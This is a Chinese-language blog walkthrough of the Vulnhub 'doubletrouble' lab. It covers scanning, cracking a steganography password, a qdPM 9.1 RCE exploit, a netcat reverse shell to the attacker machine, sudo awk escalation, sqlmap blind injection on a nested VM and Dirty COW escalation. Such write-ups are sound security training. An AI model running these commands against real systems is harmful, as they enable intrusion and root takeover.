Vulnhub靶机:doubletrouble

已于 2024-01-08 21:56:12 修改
阅读量1k 收藏 18
点赞数 13
分类专栏: 靶场 文章标签: web安全
于 2024-01-06 16:02:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/135427665
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:doubletrouble(10.0.2.7)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/

二、信息收集

使用nmap主机发现靶机ip10.0.2.7

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

在这里插入图片描述

80端口:打开网站,发现是一个登录界面,CMS为qdPM 9.1

在这里插入图片描述

本地搜索一下漏洞库,发现不少可利用的漏洞,但大部分漏洞需要用户名和密码。

searchsploit qdPM

在这里插入图片描述

使用dirsearch工具爆破目录。

在这里插入图片描述

http://10.0.2.7/install/:可以重置管理员账号的用户名和密码,但重置后还是登录失败,可能是因为数据库中保存的密码并未被修改。(数据库的账号密码可以通过上面搜索的漏洞qdPM 9.2 - Password Exposure (Unauthenticated) 获取)。

http://10.0.2.7/secret/:点击进去发现是一张可疑的JPG图片。

在这里插入图片描述
在这里插入图片描述

使用steghide工具看看图片有没有隐写

steghide info doubletrouble.jpg

在这里插入图片描述

使用stegseek 工具进行密码爆破,破解成功获得账号密码:otisrush@localhost.com\otis666

time stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt

在这里插入图片描述

在这里插入图片描述

三、漏洞利用

运行本地漏洞库qdPM 9.1 - Remote Code Execution (Authenticated) 的exp,获取backdoor

在这里插入图片描述
在这里插入图片描述

使用nc反弹shell

nc -e /bin/s 10.0.2.15 8888

在这里插入图片描述

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

使用sudo -l查看是否有特权命令,发现awk命令。

在这里插入图片描述

使用awk命令进行提权,获取root权限。

sudo awk 'BEGIN {system("/bin/bash")}'

在这里插入图片描述

在/root路径下发现虚拟机镜像,未发现flag,猜测这可能是第二层靶机。

在靶机内开启一个http服务,将第二个靶机下载下来。

cd /root/
python3 -m http.server 8080

将下载下来的镜像复制到主机,导入Virtualbox。

五、第二个镜像信息收集

使用nmap主机发现靶机ip10.0.2.8,使用nmap端口扫描发现靶机开放端口:22、80

在这里插入图片描述

打开网站发现是一个登录界面。使用dirsearch工具爆破目录,未发现其他目录信息。

在这里插入图片描述

六、第二个镜像漏洞利用

直接使用sqlmap进行注入试试,发现是基于时间盲注。

sqlmap -r a.txt --dbs

在这里插入图片描述

爆破表:sqlmap -r a.txt -D doubletrouble --tables

在这里插入图片描述

爆破字段:sqlmap -r a.txt -D doubletrouble -T users --dump

在这里插入图片描述

尝试使用爆破出来的用户名密码登录网站,发现两个账号都登录失败。想到还开放了22端口,使用账号登录ssh,登录成功。

在这里插入图片描述

七、第二个镜像提权

查看内核版本:uname -a

在这里插入图片描述

内核版本为linux 3.2.0-4,可以使用脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

将exp上传到靶机,编译运行,成功创建具有root权限的用户,用户名为firefart,切换firefart用户获得root权限。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

最后,获取flag

在这里插入图片描述

参考链接:靶机渗透练习63-doubletrouble_\192.168.9.60-CSDN博客

huang0c
关注
  • 13
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机:Raven
prettyX的博客
04-05 611
靶机介绍 有4个flag,2种方法获取Root 靶机下载:https://download.vulnhub.com/raven/Raven.ova 开始 1、靶机IP发现,本次靶机的IP为192.168.1.101 arp-scan -l
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1179
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
CTF学习-Vulnhub 靶场DOUBLETROUBLE
dengpan119的博客
03-28 3836
Vulnhub 靶场DOUBLETROUBLE 提示:IP地址用的是复制内网IP,建议是设置自己虚拟网络C段地址。 前言 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:172.X.X.176 windows10攻击机IP:172.X.X.189 靶机 ip:172.X.X.186-187 工具:VMware Workstation Pro/Oracle VM VirtualBox 提示:以下是本篇文章正文内容,下面案例可
doubletrouble1靶场详解
weixin_44681307的博客
07-12 163
把抓到的内容复制到一个空文档中去,用sqlmap跑一下,这里面的内容不能修改,空行也不可以删除,会出错。发现里面是一个图片,下载到我们kali 中去,因为都说了是秘密,所以这个图片肯定有点问题。下载到kali中运行发现需要三个参数,地址,邮箱和密码,我们刚好利用刚才找到的用户名密码。搜索了一下有没有漏洞,结果发现一大堆漏洞,直接内核提权,我下载的是40616.c这个。但是steghide发现里面隐写了东西,因为需要输入密码,所以里面肯定是有东西的。发现有一个登陆页面,用bp抓包看看,发现是post请求。
vulnhub-doubletrouble靶场
leo788的博客
02-18 576
这个靶场可以学到很多方法:1.使用stegseek工具对于隐写术的密码进行爆破;2.通过searchsploit查找开源CMS对应版本漏洞进行漏洞利用;3.使用sqlmap进行sql注入盲注;4.脏牛提权>FObins提权。
vulnhub靶场doubletrouble
最新发布
qq_58091216的博客
02-19 825
我们看到是一个登录页面,一般登录页面要么爆破,要么进行测试SQL注入,这个只能进行SQL注入。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24。我们进行查看40616.c内容, 先使用gcc连接,然后直接使用,后面不用跟其他命令。我们使用msf查找漏洞,查找到一个漏洞,但是需要密码,这个办法行不通。我们进入root查看,发现没有flag,有一个镜像,我们下载下来。我们使用kali进行查找漏洞,但是漏洞需要密码,还是不行。
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 700
攻击机:192.168.100.128靶机:192.168.100.130。
vulnhubdoubletrouble(版本一)
m0_67427205的博客
12-19 63
对扫描的目录逐一进行访问,有很多有意思的东西,但是站在出题者的角度,我觉得这道题最重要的可能是/secret目录,尝试访问,得到了一张图片。在kali中开启监听,点击shell.php运行,即可发送shell至kali,查看自己的权限,并利用python获取交互式shell。然后只需要将其上传即可,刚刚目录扫描中还有一个/uploads目录,访问该目录,点击users即可找到刚才上传的文件。很简陋的表单,尝试用刚才获取的用户名和密码登录失败,该表单如此简陋,不会有sql注入吧,sqlmap简单跑一跑。
DOUBLETROUBLE: 1实战演练
龙狼刺的博客
05-24 717
DOUBLETROUBLE 1
doubletrouble靶机通关详解
arcuied
08-10 294
doubletrouble靶机通关详解
doubletrouble靶机之隐写术、脏牛漏洞提权、GTFObins提权、qdPM 9.1CMS漏洞利用
qq_40898302的博客
05-09 520
给exp添加一个执行权限,运行exp会让输入一个密码,然后生成一个firefart的用户,就可以使用这个用户和刚设置的密码以root权限登录服务器。真实环境中需要将/tmp/passwd.bak文件copy回原来的/etc/passwd进行替换。在提取出来的文件内发现了邮箱和一个字符串,尝试到登录后台。通过查看知道图片可以隐写4.7k的信息,并且存在密码。下载Deb格式的 StegSeek(需要用翻墙代理)查看网页源码发现使用qdPM 9.1CMS框架。代码缩进存在问题,进行修复。secret : 秘密。
vlunhub系列-dobletrouble靶机
hanjinming110的博客
03-02 269
vlunhub系列之dobletrouble靶机
靶机渗透练习63-doubletrouble
hirak0的博客
04-20 3183
靶机描述 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值